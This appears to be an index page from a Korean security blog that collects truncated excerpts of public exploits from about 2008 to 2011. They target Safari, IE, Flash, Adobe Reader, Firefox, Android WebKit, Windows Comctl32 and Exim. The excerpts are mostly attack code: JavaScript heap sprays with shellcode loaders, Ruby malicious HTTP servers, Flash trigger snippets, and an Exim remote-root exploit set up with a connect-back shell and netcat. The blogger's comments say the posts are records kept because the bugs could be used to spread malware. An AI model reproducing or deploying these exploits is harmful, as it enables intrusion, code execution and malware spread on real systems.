Category: Vulnerability

Safari 5.0.5 SVG Remote Code Execution Exploit (DEP bypass)

악성코드 유포에 이용될수도 있을거 같아 기록해 둡니다.http://www.exploit-db.com/exploits/17575/[code]<html><head><script>/    Abysssec Public Advisory       apple killed one of our 0day  no point to keep it private anymore 🙁    there is another version of exploit using POPup and thats more reliable but as you know safari block pop up by default so we found a cool …

Adobe Flash Player 0-day Exploit (CVE-2011-0611)

CVE-2011-0611 취약점과 관련된 SWF에서 아래와 같인 코드가 확인된다고 한다. [code]Date.prototype.c_fun = SharedObject.prototype.getSize;Date.prototype.getDay = function () {this.c_fun();}; var eval(0) = new Date(1.41466385537348e-315);(eval(0)).getDay();[/code] [code]Date.prototype.getDay = SharedObject.prototype.getSize;var d = new Date(8.30830068348057E-246);var __callResult_19 = d.getDay();[/code]

Windows Common Control Library (Comctl32) Heap Overflow (MS10-081, CVE-2010-2746)

[code]#!/usr/bin/env ruby  # http://breakingpointsystems.com/community/blog/microsoft-vulnerability-proof-of-concept# Nephi Johnson require ‘socket’ def http_send(sock, data, opts={})    defaults = {:code=>"200", :message=>"OK", :type=>"text/html", :desc=>"content"}    opts = defaults.merge(opts)         code = opts[:code]    message = opts[:message]    type = opts[:type]         date_str = Time.now.gmtime.strftime("%a, %d %b %Y %H:%M:%S GMT")    headers = "HTTP/1.1 #{code} #{message}\r\n" +      …

Internet Explorer Uninitialized Memory Corruption Vulnerability (MS09-002, CVE-2009-0075)

[code]<SCRIPT LANGUAGE="JavaScript"> <!– Hide function killErrors() { return true; } window.onerror = killErrors; // –> </SCRIPT><script language="JavaScript">var aaa4=’생략’;var aa4=(aaa4.replace(/MV/g,"%u")); var shellcode=unescape(aa4); var array = new Array(); var calc = 0x100000-(shellcode.length*2+0x01020); var point = unescape("%u0D0D%u0D0D");while(point.length<calc) { point+=point;}var sec = point.substring(0,calc/2);delete point; for(i=0; i<0xD0; i++) {array[i] = sec + shellcode;} CollectGarbage(); var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");var a1 = new Array();for(var …

Internet Explorer 8 CSS Parser Exploit – (CVE-2010-3971, MS11-003)

인터넷 익스플로러 8 버전에 대한 취약점이 나와 기록해 둡니다.http://www.exploit-db.com/exploits/15746/ [code]#!/usr/bin/env ruby # Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/# Author: Nephi Johnson (d0c_s4vage) require ‘socket’ def http_send(sock, data, opts={})    defaults = {:code=>"200", :message=>"OK", :type=>"text/html"}    opts = defaults.merge(opts)        code = opts[:code]    message = opts[:message]    type = opts[:type]        to_send = "HTTP/1.1 #{code} #{message}\r\n" …

Exim 4.63 Remote Exploit

Exim 4.63 버전에서 리모트에서 root 권한 획득이 가능한 취약점이 발표되었습니다. 리모트에서 rooting이 가능한 취약점은 오랜만에 보는거 같네요.[code]#Exim 4.63 (RedHat/Centos/Debian) Remote Root Exploit by Kingcope#Modified perl version of metasploit module =for comment use this connect back shell as "trojanurl" and be sure to setup a netcat, —snip— $system = ‘/bin/sh’;br>$ARGC=@ARGV;

Mozilla Firefox <= 3.6.12 Remote Denial Of Service

최근에 Firefox 취약점이 자주 나오네요.. 불안하게 -_-출처 : http://www.exploit-db.com/exploits/15498/ [code]<!–     0day Mozilla Firefox <= 3.6.12 Remote Denial Of Service     Credits:    Emanuele ’emgent’ Gentili    <emgent@backtrack-linux.org>    Marco ‘white_sheep’ Rondini    <white_sheep@backtrack-linux.org>    Alessandro ‘scox’ Scoscia    <scox@backtrack.it> –> <script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script><script>var i=0;for (i=0;i<=19999;i++){    document.write("a");} for (i=0;i<=3;i++){    document.write(document.body.innerHTML);} </script>[/code]

Adobe Reader 관련 취약점 정리

Adobe 관련 취약점들이 수도없이 쏟아져 나왔으며 계속해서 나오고 있다. 정리가 필요할 거 같아 정리해둔다.빠진건 계속해서 업데이트 하고 우선 이것들만…… 이후엔 Sandbox 형태로 바뀔거라고 하던데 과연? # util.printf – CVE-2008-2992[code]Adobe Reader Javascript Printf Buffer Overflow Exploit===========================================================Reference: http://www.coresecurity.com/content/adobe-reader-buffer-overflowCVE-2008-2992 Thanks to coresecurity for the technical background. 6Nov,2008: Exploit released by me Credits: Debasis Mohantywww.hackingspirits.comwww.coffeeandsecurity.com=========================================================== //Exploit by Debasis Mohanty (aka nopsledge/Tr0y)//www.coffeeandsecurity//www.hackingspirits.com  // win32_bind –  …

Android 2.0-2.1 Reverse Shell Exploit – CVE-2010-1807

안드로이드에서 원격에서 실행가능한 취약점이 확인되었네요.. 기록용으로 남겨 둡니다.출처 : http://www.exploit-db.com/exploits/15423/, http://www.exploit-db.com/exploits/15548/ [code]<html><head><script>// bug   =  webkit code execution CVE-2010-1807 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807//           listed as a safari bug but also works on android 🙂//tested =  moto droid 2.0.1 , moto droid 2.1 , emulater 2.0 – 2.1//patched=  android 2.2//author =   mj// hardcoded …

Internet Explorer Memory Corruption 0day Vulnerability – CVE-2010-3962, MS10-090

익스플로러 취약점이 또 나왔네요. 악성코드 유포에 이용될 수 있기에 기록해 둡니다.출처 : http://www.exploit-db.com/exploits/15421/ [code]# Internet Explorer Memory Corruption 0day Vulnerability CVE-2010-3962# Tested on Windows XP SP3 IE6 IE7 IE8# Coded by Matteo Memelli ryujin at offsec.com# http://www.offensive-security.com/0day/ie-0day.txt# Thx to dookie at offsec.com# notes    : This is a quick and dirty exploit! No DEP/ASLR bypass …